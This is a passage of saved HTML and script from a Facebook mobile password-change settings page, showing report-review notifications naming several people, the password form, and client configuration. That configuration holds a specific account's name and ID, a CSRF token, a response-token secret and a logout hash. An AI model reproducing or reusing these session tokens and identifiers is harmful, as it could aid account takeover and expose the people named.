class="_52jh blueName"> Yad Shwan </span> . <br/> <i class="img sp_8gZJByakRdO sx_1679e2"> </i> <span class="mfss fcg"> <abbr data-sigil="timestamp" data-store='{"time":1527773547,"short":false,"forceseconds":false}'> Yesterday at 4:02pm </abbr> </span> </div> </div> </a> </div> </li> <li class="aclb abt" data-sigil="notification marea" id="notif_1527772679653963"> <div class="touchable-notification"> <a class="touchable" data-sigil="touchable" data-store='{"notif_id":1527772679653963,"target_id":null}' href="https://m.facebook.com/support/view_details/?id=174442916728064&amp;ref_medium=textonly&amp;ref=notif&amp;notif_t=scase_reviewed&amp;second=0&amp;notif_id=1527772679653963"> <div class="ib"> <i class="img l" style="background:#d8dce6 url('https\\3a //static.xx.fbcdn.net/rsrc.php/v3/yw/r/iF3MhG7NKO-.png') no-repeat center;background-size:100% 100%;-webkit-background-size:100% 100%;width:43px;height:43px;"> </i> <div class="c"> We reviewed your report of <span class="_52jh blueName"> Yad Shwan </span> . <br/> <i class="img sp_8gZJByakRdO sx_1679e2"> </i> <span class="mfss fcg"> <abbr data-sigil="timestamp" data-store='{"time":1527772679,"short":false,"forceseconds":false}'> Yesterday at 3:47pm </abbr> </span> </div> </div> </a> </div> </li> <li class="acw abt" data-sigil="notification marea" id="notif_1527762719153405"> <div class="touchable-notification"> <a class="touchable" data-sigil="touchable" data-store='{"notif_id":1527762719153405,"target_id":null}' href="https://m.facebook.com/support/view_details/?id=174368700068819&amp;ref_medium=textonly&amp;ref=notif&amp;notif_t=scase_reviewed&amp;second=0&amp;notif_id=1527762719153405"> <div class="ib"> <i class="img l" style="background:#d8dce6 url('https\\3a //static.xx.fbcdn.net/rsrc.php/v3/yw/r/iF3MhG7NKO-.png') no-repeat center;background-size:100% 100%;-webkit-background-size:100% 100%;width:43px;height:43px;"> </i> <div class="c"> We reviewed your report of <span class="_52jh blueName"> Hadi Mene </span> . <br/> <i class="img sp_8gZJByakRdO sx_1679e2"> </i> <span class="mfss fcg"> <abbr data-sigil="timestamp" data-store='{"time":1527762719,"short":false,"forceseconds":false}'> Yesterday at 1:01pm </abbr> </span> </div> </div> </a> </div> </li> <li class="aclb abt" data-sigil="notification marea" id="notif_1527720764707016"> <div class="touchable-notification"> <a class="touchable" data-sigil="touchable" data-store='{"notif_id":1527720764707016,"target_id":null}' href="https://m.facebook.com/support/view_details/?id=174122800093409&amp;ref_medium=textonly&amp;ref=notif&amp;notif_t=scase_reviewed&amp;second=0&amp;notif_id=1527720764707016"> <div class="ib"> <i class="img l" style="background:#d8dce6 url('https\\3a //static.xx.fbcdn.net/rsrc.php/v3/yw/r/iF3MhG7NKO-.png') no-repeat center;background-size:100% 100%;-webkit-background-size:100% 100%;width:43px;height:43px;"> </i> <div class="c"> We reviewed your report of <span class="_52jh blueName"> Louie Hernandez </span> . <br/> <i class="img sp_8gZJByakRdO sx_1679e2"> </i> <span class="mfss fcg"> <abbr data-sigil="timestamp" data-store='{"time":1527720764,"short":false,"forceseconds":false}'> Yesterday at 1:22am </abbr> </span> </div> </div> </a> </div> </li> <li class="aclb abt" data-sigil="notification marea" id="notif_1527720538746269"> <div class="touchable-notification"> <a class="touchable" data-sigil="touchable" data-store='{"notif_id":1527720538746269,"target_id":null}' href="https://m.facebook.com/support/view_details/?id=174122093426813&amp;ref_medium=textonly&amp;ref=notif&amp;notif_t=scase_reviewed&amp;second=0&amp;notif_id=1527720538746269"> <div class="ib"> <i class="img l" style="background:#d8dce6 url('https\\3a //static.xx.fbcdn.net/rsrc.php/v3/yw/r/iF3MhG7NKO-.png') no-repeat center;background-size:100% 100%;-webkit-background-size:100% 100%;width:43px;height:43px;"> </i> <div class="c"> We reviewed your report of <span class="_52jh blueName"> Louie Hernandez </span> . <br/> <i class="img sp_8gZJByakRdO sx_1679e2"> </i> <span class="mfss fcg"> <abbr data-sigil="timestamp" data-store='{"time":1527720538,"short":false,"forceseconds":false}'> Yesterday at 1:18am </abbr> </span> </div> </div> </a> </div> </li> <li class="item more acw abt" data-sigil="marea"> <a class="touchable primary" data-sigil="touchable" href="/notifications.php?more"> <div class="primarywrap"> <div class="content"> <div class="title mfsm fcl"> <strong> See all notifications </strong> </div> </div> </div> </a> </li> </ol> </div> </div> <div class="_imu"> </div> </div> </div> </div> <div class="_4g34"> <div class="_59te jewel _hzb noCount" data-sigil="nav-popover search" data-store='{"tab":"search"}' id="search_jewel"> <a class="_19no touchable" data-sigil="icon" href="#" id="u_0_g" role="button"> <span style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0"> Search </span> <div class="_2ftp _62ta"> <div class="_59tf _2ftq"> <span class="_59tg" data-sigil="count"> 0 </span> </div> </div> </a> <div class="flyout popover_hidden" data-sigil="flyout" id="u_0_0" role="complementary"> <div data-sigil="flyout-content context-layer-root"> <div class="_55wp inner" data-sigil="contents"> <div class="_1xh1"> <span aria-busy="true" aria-valuemax="100" aria-valuemin="0" aria-valuetext="Loading..." class="img _55ym _55yq _55yo" role="progressbar"> </span> </div> </div> </div> <div class="_imu"> </div> </div> </div> </div> <div class="_4g34"> <div class="_59te jewel _hzb noCount _4wrj" data-nocookies="1" data-sigil="nav-popover bookmarks" data-store='{"tab":"bookmarks"}' id="bookmarks_jewel"> <a class="_19no touchable" data-sigil="menu-link icon" href="#" id="u_0_h" role="button"> <span style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0"> Main Menu </span> <div class="_2ftp _62ta"> <div class="_59tf _2ftq"> <span class="_59tg" data-sigil="count"> 0 </span> </div> </div> </a> <div class="flyout popover_hidden" data-sigil="flyout" id="u_0_2" role="complementary"> <div data-sigil="flyout-content context-layer-root"> <ol class="_7k7 inner" data-sigil="contents" id="u_0_1"> <li class="acw apl" data-sigil="marea"> <div style="text-align:center;"> <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root" id="u_0_3"> </div> </div> </li> </ol> </div> <div class="_imu"> </div> </div> </div> </div> </div> </div> </div> <div id="m:chrome:schedulable-graph-search"> </div> <div class="_2v9s" data-sigil="context-layer-root content-pane" id="root" role="main"> <div class="_55ws"> <form action="login.php" data-sigil="m-settings-form" id="m-settings-form" method="post"> <input autocomplete="off" name="fb_dtsg" type="hidden" value="AQFSV7NZfTAI:AQGblYoEMJbh"/> <div class="_56be" style="margin-bottom: 12px"> <div class="_55wo _55x2 _56bf"> <input autocapitalize="off" autocomplete="off" autocorrect="off" class="_56bg _55ws" name="old_password" placeholder="Current password" type="password"/> <input autocapitalize="off" autocomplete="off" autocorrect="off" class="_56bg _55ws" name="new_password" placeholder="New password" type="password"/> <input autocapitalize="off" autocomplete="off" autocorrect="off" class="_56bg _55ws" name="new_password" placeholder="Re-type new password" type="password"/> </div> </div> <div> <button class="_54k8 _52jg _56bs _26vk _56b_ _56bw _56bu" data-sigil="touchable" name="save" type="submit" value="Save Changes"> <span class="_55sr"> Save Changes </span> </button> <a class="_54k8 _56bs _26vk _56b_ _56bw _56bt _52jg" data-sigil="touchable" href="/settings/security/" role="button" style="margin-top: 12px"> <span class="_55sr"> Cancel </span> </a> </div> </form> <div class="_52jc _52jj _55ws"> <a href="/recover/initiate/?c=https%3A%2F%2Ftouch.facebook.com%2Fsettings%2Fsecurity%2Fpassword%2F" id="forgot-password-link"> Forgot Password? </a> </div> </div> <div> </div> </div> <div class="viewportArea _2v9s" data-sigil="marea" id="u_0_i" style="display:none"> <div class="_5vsg" id="u_0_j"> </div> <div class="_5vsh" id="u_0_k"> </div> <div class="_5v5d fcg"> <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root"> </div> Loading... </div> </div> <div class="viewportArea aclb" data-sigil="marea" id="mErrorView" style="display:none"> <div class="container"> <div class="image"> </div> <div class="message" data-sigil="error-message"> </div> <a class="link" data-sigil="MPageError:retry"> Try Again </a> </div> </div> </div> </div> <div id="static_templates"> <div class="mDialog" id="modalDialog" style="display:none"> <div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader"> <div class="_4g33 _52we"> <div class="_5s61"> <div class="_52z7"> <button class="cancelButton btn btnD bgb mfss touchable" data-sigil="dialog-cancel-button" id="u_0_m" type="submit" value="Cancel"> Cancel </button> <button aria-label="Back" class="backButton btn btnI bgb mfss touchable iconOnly" data-sigil="dialog-back-button" id="u_0_n" type="submit" value="Back"> <i class="img sp_Tz_1R9eshBx sx_109a94" style="margin-top: 2px;"> </i> </button> </div> </div> <div class="_4g34"> <div class="_52z6"> <div class="_50l4 mfsl fcw" data-sigil="m-dialog-header-title dialog-title" id="m-future-page-header-title"> Loading... </div> </div> </div> <div class="_5s61"> <div class="_52z8" id="modalDialogHeaderButtons"> </div> </div> </div> </div> <div class="modalDialogView" id="modalDialogView"> </div> <div class="_5v5d _5v5e fcg" id="dialogSpinner"> <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root" id="u_0_l"> </div> Loading... </div> </div> </div> <script type="text/javascript"> /*<![CDATA[*/(function(){function si_cj(m){setTimeout(function(){new Image().src="https:\\/\\/error.facebook.com\\/common\\/scribe_endpoint.php?c=si_clickjacking&t=6330"+"&m="+m;},5000);}if(top!=self && !false){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 https:\\/\\/touch.facebook.com\\/login\\/save-device\\/?login_source=login");}catch(e){si_cj("1 \\thttps:\\/\\/touch.facebook.com\\/login\\/save-device\\/?login_source=login");window.document.write("\\u003Cstyle>body * {display:none !important;}\\u003C\\/style>\\u003Ca href=\\"#\\" onclick=\\"top.location.href=window.location.href\\" style=\\"display:block !important;padding:10px\\">Go to Facebook.com\\u003C\\/a>");/*9G7L1Tnn*/}}}())/*]]>*/ </script> <script crossorigin="anonymous" data-bootloader-hash="++0ur" id="u_0_t" src="https://static.xx.fbcdn.net/rsrc.php/v3iP6F4/yK/l/en_US/R8tpWLUTl9B.js"> </script> <script crossorigin="anonymous" data-bootloader-hash="mmyXd" id="u_0_u" src="https://static.xx.fbcdn.net/rsrc.php/v3i9bE4/yJ/l/en_US/2iXQuRxXYVV.js"> </script> <script id="u_0_v"> require("TimeSlice").guard(function() {(require("ServerJSDefine")).handleDefines([["MWebStorageMonsterWhiteList",[],{"whitelist":["^Banzai$","^bz","^mutex","^msys","^sp_pi$","^\\\\:userchooser\\\\:osessusers$","^\\\\:userchooser\\\\:settings$","^[0-9]+:powereditor:","^Bandicoot\\\\:","^brands\\\\:console\\\\:config$","^CacheStorageVersion$","^consoleEnabled$","^_video_$","^vc_","^_showMDevConsole$","^_ctv_$","^ga_client_id$","^qe_switcher_nub_selection$","^_mswam_$"]},254],["ServerNonce",[],{"ServerNonce":"CagbtVf4Hbl_B727qzc14J"},141],["UserAgentData",[],{"browserArchitecture":"32","browserFullVersion":"62.0.3202.89","browserMinorVersion":0,"browserName":"Chrome","browserVersion":62,"deviceName":"Unknown","engineName":"WebKit","engineVersion":"537.36","platformArchitecture":"32","platformName":"Linux","platformVersion":null,"platformFullVersion":null},527],["MTouchableSyntheticClickGK",[],{"USE_SYNTHETIC_CLICK":true},368],["ErrorDebugHooks",[],{"SnapShotHook":null},185],["KSConfig",[],{"killed":{"__set":["POCKET_MONSTERS_CREATE","POCKET_MONSTERS_DELETE","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","PREVENT_INFINITE_URL_REDIRECT","POCKET_MONSTERS_UPDATE_NAME"]}},2580],["MJSEnvironment",[],{"IS_APPLE_WEBKIT_IOS":false,"IS_TABLET":false,"IS_ANDROID":false,"IS_CHROME":true,"IS_FIREFOX":false,"IS_WINDOWS_PHONE":false,"IS_SAMSUNG_DEVICE":false,"OS_VERSION":0,"PIXEL_RATIO":1,"BROWSER_NAME":"Chrome Desktop"},46],["MLoadingIndicatorSigils",[],{"ANIMATE":"m-loading-indicator-animate","ROOT":"m-loading-indicator-root"},279],["MRequestConfig",[],{"dtsg":{"token":"AQFSV7NZfTAI:AQGblYoEMJbh","valid_for":86400,"expire":1527962712},"checkResponseOrigin":true,"checkResponseToken":true,"ajaxResponseToken":{"secret":"HQEbK1BJmtQ2ac9uG5mdM_hRunxW37G_","encrypted":"AYkS3fOUqZGer4hLzr1NMELS2MbYPl205bKnu3AEGqr64j0LXW_jbtfnK57bzI8pUY9FNH96Ign7cUHLp9x-4SxpOi_Q1Jesqb8edpMUxO4yEA"}},51],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["ZeroRewriteRules",[],{"rewrite_rules":\{},"whitelist":{"\\/hr\\/r":1,"\\/hr\\/p":1,"\\/zero\\/unsupported_browser\\/":1,"\\/zero\\/policy\\/optin":1,"\\/zero\\/optin\\/write\\/":1,"\\/zero\\/optin\\/legal\\/":1,"\\/zero\\/optin\\/free\\/":1,"\\/about\\/privacy\\/":1,"\\/about\\/privacy\\/update\\/":1,"\\/about\\/privacy\\/update":1,"\\/zero\\/toggle\\/welcome\\/":1,"\\/work\\/landing":1,"\\/work\\/login\\/":1,"\\/work\\/email\\/":1,"\\/ai.php":1,"\\/js_dialog_resources\\/dialog_descriptions_android.json":0,"\\/connect\\/jsdialog\\/MPlatformAppInvitesJSDialog\\/":0,"\\/connect\\/jsdialog\\/MPlatformOAuthShimJSDialog\\/":0,"\\/connect\\/jsdialog\\/MPlatformLikeJSDialog\\/":0,"\\/qp\\/interstitial\\/":1,"\\/qp\\/action\\/redirect\\/":1,"\\/qp\\/action\\/close\\/":1,"\\/zero\\/support\\/ineligible\\/":1,"\\/zero_balance_redirect\\/":1,"\\/zero_balance_redirect":1,"\\/l.php":1,"\\/lsr.php":1,"\\/ajax\\/dtsg\\/":1,"\\/checkpoint\\/block\\/":1,"\\/exitdsite":1,"\\/zero\\/balance\\/pixel\\/":1,"\\/zero\\/balance\\/":1,"\\/zero\\/balance\\/carrier_landing\\/":1,"\\/tr":1,"\\/tr\\/":1,"\\/sem_campaigns\\/sem_pixel_test\\/":1,"\\/bookmarks\\/flyout\\/body\\/":1,"\\/zero\\/subno\\/":1,"\\/confirmemail.php":1,"\\/policies\\/":1,"\\/mobile\\/internetdotorg\\/classifier":1,"\\/4oh4.php":1,"\\/autologin.php":1,"\\/birthday_help.php":1,"\\/checkpoint\\/":1,"\\/contact-importer\\/":1,"\\/cr.php":1,"\\/legal\\/terms\\/":1,"\\/login.php":1,"\\/login\\/":1,"\\/mobile\\/account\\/":1,"\\/n\\/":1,"\\/remote_test_device\\/":1,"\\/upsell\\/buy\\/":1,"\\/upsell\\/buyconfirm\\/":1,"\\/upsell\\/buyresult\\/":1,"\\/upsell\\/promos\\/":1,"\\/upsell\\/continue\\/":1,"\\/upsell\\/h\\/promos\\/":1,"\\/upsell\\/loan\\/learnmore\\/":1,"\\/upsell\\/purchase\\/":1,"\\/upsell\\/promos\\/upgrade\\/":1,"\\/upsell\\/buy_redirect\\/":1,"\\/upsell\\/loan\\/buyconfirm\\/":1,"\\/upsell\\/loan\\/buy\\/":1,"\\/upsell\\/sms\\/":1,"\\/wap\\/a\\/channel\\/reconnect.php":1,"\\/wap\\/a\\/nux\\/wizard\\/nav.php":1,"\\/wap\\/appreg.php":1,"\\/wap\\/birthday_help.php":1,"\\/wap\\/c.php":1,"\\/wap\\/confirmemail.php":1,"\\/wap\\/cr.php":1,"\\/wap\\/login.php":1,"\\/wap\\/r.php":1,"\\/zero\\/datapolicy":1,"\\/a\\/timezone.php":1,"\\/a\\/bz":1,"\\/bz\\/reliability":1,"\\/r.php":1,"\\/mr\\/":1,"\\/reg\\/":1,"\\/registration\\/log\\/":1,"\\/terms\\/":1,"\\/f123\\/":1,"\\/expert\\/":1,"\\/experts\\/":1,"\\/terms\\/index.php":1,"\\/terms.php":1,"\\/srr\\/":1,"\\/msite\\/redirect\\/":1,"\\/fbs\\/pixel\\/":1,"\\/contactpoint\\/preconfirmation\\/":1,"\\/contactpoint\\/cliff\\/":1,"\\/contactpoint\\/confirm\\/submit\\/":1,"\\/contactpoint\\/confirmed\\/":1,"\\/contactpoint\\/login\\/":1,"\\/preconfirmation\\/contactpoint_change\\/":1,"\\/help\\/contact\\/":1,"\\/survey\\/":1,"\\/upsell\\/loyaltytopup\\/accept\\/":1,"\\/settings\\/":1}},1478],["ZeroCategoryHeader",[],\{},1127],["CurrentCommunityInitialData",[],\{},490],["BootloaderConfig",[],{"jsRetries":null,"jsRetryAbortNum":2,"jsRetryAbortTime":5,"payloadEndpointURI":"https:\\/\\/touch.facebook.com\\/ajax\\/haste-response\\/","assumeNotNonblocking":false,"assumePermanent":true,"skipEndpoint":true},329],["CSSLoaderConfig",[],{"timeout":5000,"modulePrefix":"BLCSS:","loadEventSupported":true},619],["CurrentUserInitialData",[],{"USER_ID":"100024870700996","ACCOUNT_ID":"100024870700996","NAME":"Brutix Fsec","SHORT_NAME":"Brutix","IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false},270],["ISB",[],\{},330],["LSD",[],\{},323],["SiteData",[],{"server_revision":3963560,"client_revision":3963560,"tier":"","push_phase":"C3","pkg_cohort":"FW_EXP:mtouch_pkg","pkg_cohort_key":"__pc","haste_site":"mobile","be_mode":-1,"be_key":"__be","is_rtl":false,"vip":"157.240.9.18"},317],["SprinkleConfig",[],{"param_name":"jazoest"},2111],["ErrorSignalConfig",[],{"uri":"https:\\/\\/error.facebook.com\\/common\\/scribe_endpoint.php"},319],["MSession",[],{"useAngora":false,"logoutURL":"\\/logout.php?h=AfdUd4vZpexkdP59&t=1527876312","push_phase":"C3"},52],["ArtilleryComponentSaverOptions",[],{"options":{"ads_wait_time_saver":{"shouldCompress":false,"shouldUploadSeparately":false},"ads_flux_profiler_saver":{"shouldCompress":true,"shouldUploadSeparately":false},"timeslice_execution_saver":{"shouldCompress":true,"shouldUploadSeparately":false},"interaction_async_request_join_data":{"shouldCompress":true,"shouldUploadSeparately":true},"resources_saver":{"shouldCompress":true,"shouldUploadSeparately":false},"user_timing_saver":{"shouldCompress":false,"shouldUploadSeparately":false}}},3016],["TimeSliceInteractionSV",[],{"on_demand_reference_counting":true,"on_demand_profiling_counters":true,"default_rate":1000,"lite_default_rate":100,"interaction_to_lite_coinflip":{"ADS_INTERFACES_INTERACTION":0,"ads_perf_scenario":0,"ads_wait_time":0,"Event":10,"video_psr":0,"video_stall":0},"interaction_to_coinflip":{"ADS_INTERFACES_INTERACTION":1,"ads_perf_scenario":1,"ads_wait_time":1,"video_psr":1000000,"video_stall":2500000,"Event":500,"watch_carousel_left_scroll":1,"watch_carousel_right_scroll":1,"watch_sections_load_more":1,"watch_discover_scroll":1,"fbpkg_ui":1,"backbone_ui":1},"enable_heartbeat":true,"maxBlockMergeDuration":0,"maxBlockMergeDistance":0,"enable_banzai_stream":true,"user_timing_coinflip":50,"banzai_stream_coinflip":1,"compression_enabled":true,"ref_counting_fix":true,"ref_counting_cont_fix":false,"also_record_new_timeslice_format":false,"force_async_request_tracing_on":false},2609],["MRenderingSchedulerConfig",[],{"delayNormalResources":true,"isDisplayJSEnabled":false},1978],["CookieCoreConfig",[],{"a11y":\{},"act":\{},"c_user":\{},"ddid":{"p":"\\/deferreddeeplink\\/","t":2419200},"dpr":{"t":604800},"js_ver":{"t":604800},"locale":{"t":604800},"lh":{"t":604800},"m_pixel_ratio":{"t":604800},"noscript":\{},"pnl_data2":{"t":2},"presence":\{},"rdir":\{},"sW":\{},"sfau":\{},"wd":{"t":604800},"x-referer":\{},"x-src":{"t":1}},2104],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5},3401],["SessionNameConfig",[],{"seed":"0wWe"},757],["BigPipeExperiments",[],{"link_images_to_pagelets":false},907],["FbtLogger",[],{"logger":null},288],["IntlNumberTypeConfig",[],{"impl":"if (n === 1) { return IntlVariations.NUMBER_ONE; } else { return IntlVariations.NUMBER_OTHER; }"},3405],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlHoldoutGK",[],{"inIntlHoldout":false},2827],["IntlViewerContext",[],{"GENDER":1},772],["NumberFormatConfig",[],{"decimalSeparator":".","numberDelimiter":",","minDigitsForThousandsSeparator":4,"standardDecimalPatternInfo":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["IntlPhonologicalRules",[],{"meta":{"\\/_B\\/":"([.,!?\\\\s]|^)","\\/_E\\/":"([.,!?\\\\s]|$)"},"patterns":{"\\/\\u0001(.*)('|&#039;)s\\u0001(?:'|&#039;)s(.*)\\/":"\\u0001$1$2s\\u0001$3","\\/_\\u0001([^\\u0001]*)\\u0001\\/":"javascript"}},1496],["AsyncProfilerWorkerResource",[],{"url":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yq\\/r\\/L2E1WjzsO7-.js","name":"AsyncProfilerWorkerBundle"},2779],["WebWorkerConfig",[],{"logging":{"enabled":false,"config":"WebWorkerLoggerConfig"},"evalWorkerURL":"\\/rsrc.php\\/v3\\/yK\\/r\\/pcnyCVb0ZCt.js"},297],["FWLoader",[],\{},278],["MPageControllerGating",[],{"shouldDeferUntilCertainNoRedirect":false},2023],["CLDRDateRenderingClientRollout",[],{"formatDateClientLoggerSamplingRate":0.0001},3003],["DateFormatConfig",[],{"numericDateOrder":["m","d","y"],"numericDateSeparator":"\\/","shortDayNames":["Mon","Tue","Wed","Thu","Fri","Sat","Sun"],"timeSeparator":":","weekStart":6,"formats":{"D":"D","D g:ia":"D g:ia","D M d":"D M d","D M d, Y":"D M d, Y","D M j":"D M j","D M j, g:ia":"D M j, g:ia","D M j, y":"D M j, y","D M j, Y g:ia":"D M j, Y g:ia","D, M j, Y":"D, M j, Y","F d":"F d","F d, Y":"F d, Y","F g":"F g","F j":"F j","F j, Y":"F j, Y","F j, Y \\u0040 g:i A":"F j, Y \\u0040 g:i A","F j, Y g:i a":"F j, Y g:i a","F jS":"F jS","F jS, g:ia":"F jS, g:ia","F jS, Y":"F jS, Y","F Y":"F Y","g A":"g A","g:i":"g:i","g:i A":"g:i A","g:i a":"g:i a","g:iA":"g:iA","g:ia":"g:ia","g:ia F jS, Y":"g:ia F jS, Y","g:iA l, F jS":"g:iA l, F jS","g:ia M j":"g:ia M j","g:ia M jS":"g:ia M jS","g:ia, F jS":"g:ia, F jS","g:iA, l M jS":"g:iA, l M jS","g:sa":"g:sa","H:I - M d, Y":"H:I - M d, Y","h:i a":"h:i a","h:m:s m\\/d\\/Y":"h:m:s m\\/d\\/Y","j":"j","l F d, Y":"l F d, Y","l g:ia":"l g:ia","l, F d, Y":"l, F d, Y","l, F j":"l, F j","l, F j, Y":"l, F j, Y","l, F jS":"l, F jS","l, F jS, g:ia":"l, F jS, g:ia","l, M j":"l, M j","l, M j, Y":"l, M j, Y","l, M j, Y g:ia":"l, M j, Y g:ia","M d":"M d","M d, Y":"M d, Y","M d, Y g:ia":"M d, Y g:ia","M d, Y ga":"M d, Y ga","M j":"M j","M j, Y":"M j, Y","M j, Y g:i A":"M j, Y g:i A","M j, Y g:ia":"M j, Y g:ia","M jS, g:ia":"M jS, g:ia","M Y":"M Y","M y":"M y","m-d-y":"m-d-y","M. d":"M. d","M. d, Y":"M. d, Y","j F Y":"j F Y","m.d.y":"m.d.y","m\\/d":"m\\/d","m\\/d\\/Y":"m\\/d\\/Y","m\\/d\\/y":"m\\/d\\/y","m\\/d\\/Y g:ia":"m\\/d\\/Y g:ia","m\\/d\\/y H:i:s":"m\\/d\\/y H:i:s","m\\/d\\/Y h:m":"m\\/d\\/Y h:m","n":"n","n\\/j":"n\\/j","n\\/j, g:ia":"n\\/j, g:ia","n\\/j\\/y":"n\\/j\\/y","Y":"Y","Y-m-d":"Y-m-d","Y\\/m\\/d":"Y\\/m\\/d","y\\/m\\/d":"y\\/m\\/d","j \\/ F \\/ Y":"j \\/ F \\/ Y"},"ordinalSuffixes":{"1":"st","2":"nd","3":"rd","4":"th","5":"th","6":"th","7":"th","8":"th","9":"th","10":"th","11":"th","12":"th","13":"th","14":"th","15":"th","16":"th","17":"th","18":"th","19":"th","20":"th","21":"st","22":"nd","23":"rd","24":"th","25":"th","26":"th","27":"th","28":"th","29":"th","30":"th","31":"st"}},165],["MarauderConfig",[],{"app_version":"3963560","gk_enabled":false},31],["KillabyteProfilerConfig",[],{"htmlProfilerModule":null,"profilerModule":null,"depTypes":{"BL":"bl","NON_BL":"non-bl"}},1145],["ArtilleryExperiments",[],{"artillery_static_resources_pagelet_attribution":false,"artillery_timeslice_compressed_data":false,"artillery_miny_client_payload":false,"artillery_prolong_page_tracing":false,"artillery_navigation_timing_level_2":false,"artillery_profiler_on":false,"artillery_merge_max_distance_sec":1,"artillery_merge_max_duration_sec":1},1237],["QuicklingConfig",[],{"version":"3963560;0;","sessionLength":30,"inactivePageRegex":"^\\/(fr\\/u\\\\.php|ads\\/|advertising|ac\\\\.php|ae\\\\.php|a\\\\.php|ajax\\/emu\\/(end|f|h)\\\\.php|badges\\/|comments\\\\.php|connect\\/uiserver\\\\.php|editalbum\\\\.php.+add=1|ext\\/|feeds\\/|help([\\/?]|$)|identity_switch\\\\.php|isconnectivityahumanright\\/|intern\\/|login\\\\.php|logout\\\\.php|sitetour\\/homepage_tour\\\\.php|sorry\\\\.php|syndication\\\\.php|webmessenger|\\/plugins\\/subscribe|lookback|brandpermissions|gameday|pxlcld|worldcup\\/map|livemap|work\\/admin|([^\\/]+\\/)?dialog)|legal|\\\\.pdf$","badRequestKeys":["nonce","access_token","oauth_token","xs","checkpoint_data","code"],"logRefreshOverhead":false},60],["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","link_react_default_hash":"ATNs7_Ksel2JKVQTTfXU-_KE8boavuYfbpSB0a8N-dgWfWxv7_6JvGQsZX4SHGx_Yt9HOR_Ew9SY3W7lGZi-TF5JE99qsJeIvkIgpf-6Z6FzVw","untrusted_link_default_hash":"ATPfylpGY2igq7jCeZ7HeTiMwqrPPGRO16STKS0awydygSPoc86Gq-MQpRPMPtn12w9mJZ8AH46fcD8B53IRT2VSNFWCzmt8SRngJBo587KLnA","linkshim_host":"lm.facebook.com","use_rel_no_opener":true,"always_use_https":true,"onion_always_shim":true,"middle_click_requires_event":true,"www_safe_js_mode":"asynclazy","m_safe_js_mode":"MLynx_asynclazy"},27],["ImmediateActiveSecondsConfig",[],{"sampling_rate":2003,"ias_bucket":848},423],["ReactGK",[],{"debugRenderPhaseSideEffects":false,"alwaysUseRequestIdleCallbackPolyfill":true,"fiberAsyncScheduling":false,"unmountOnBeforeClearCanvas":true,"fireGetDerivedStateFromPropsOnStateUpdates":true},998],["CoreWarningGK",[],{"forceWarning":false},725],["MBanzaiConfig",[],{"EXPIRY":86400000,"MAX_SIZE":10000,"MAX_WAIT":30000,"RESTORE_WAIT":30000,"gks":{"boosted_component":true,"mchannel_jumpstart":true,"platform_oauth_client_events":true,"visibility_tracking":true,"boosted_pagelikes":true,"gqls_web_logging":true},"blacklist":["time_spent"]},32],["FbtQTOverrides",[],{"overrides":{"1_43839c1f069957436e65d660aa31e1a0":"Pay no fees on movie tickets"}},551],["EventConfig",[],{"sampling":{"bandwidth":0,"play":0,"playing":0,"progress":0,"pause":0,"ended":0,"seeked":0,"seeking":0,"waiting":0,"loadedmetadata":0,"canplay":0,"selectionchange":0,"change":0,"timeupdate":2000000,"adaptation":0,"focus":0,"blur":0,"load":0,"error":0,"message":0,"abort":0,"storage":0,"scroll":200000,"mousemove":20000,"mouseover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{"BlueBarAccountChevronMenu":" _5lxs(?: .*)?$","BlueBarHomeButton":" _bluebarLinkHome__interaction-root(?: .*)?$","BlueBarProfileLink":" _1k67(?: .*)?$","ReactComposerSproutMedia":" _1pnt(?: .*)?$","ReactComposerSproutAlbum":" _1pnu(?: .*)?$","ReactComposerSproutNote":" _3-9x(?: .*)?$","ReactComposerSproutLocation":" _1pnv(?: .*)?$","ReactComposerSproutActivity":" _1pnz(?: .*)?$","ReactComposerSproutPeople":" _1pn-(?: .*)?$","ReactComposerSproutLiveVideo":" _5tv7(?: .*)?$","ReactComposerSproutMarkdown":" _311p(?: .*)?$","ReactComposerSproutFormattedText":" _mwg(?: .*)?$","ReactComposerSproutSticker":" _2vri(?: .*)?$","ReactComposerSproutSponsor":" _5t5q(?: .*)?$","ReactComposerSproutEllipsis":" _1gr3(?: .*)?$","ReactComposerSproutContactYourRepresentative":" _3cnv(?: .*)?$","ReactComposerSproutFunFact":" _2_xs(?: .*)?$","TextExposeSeeMoreLink":" see_more_link(?: .*)?$","SnowliftBigCloseButton":"(?: _xlt(?: .*)? _418x(?: .*)?$| _418x(?: .*)? _xlt(?: .*)?$)","SnowliftPrevPager":"(?: snowliftPager(?: .*)? prev(?: .*)?$| prev(?: .*)? snowliftPager(?: .*)?$)","SnowliftNextPager":"(?: snowliftPager(?: .*)? next(?: .*)?$| next(?: .*)? snowliftPager(?: .*)?$)","SnowliftFullScreenButton":"#fbPhotoSnowliftFullScreenSwitch( .+)*","PrivacySelectorMenu":"(?: _57di(?: .*)? _2wli(?: .*)?$| _2wli(?: .*)? _57di(?: .*)?$)","ReactComposerFeedXSprouts":" _nh6(?: 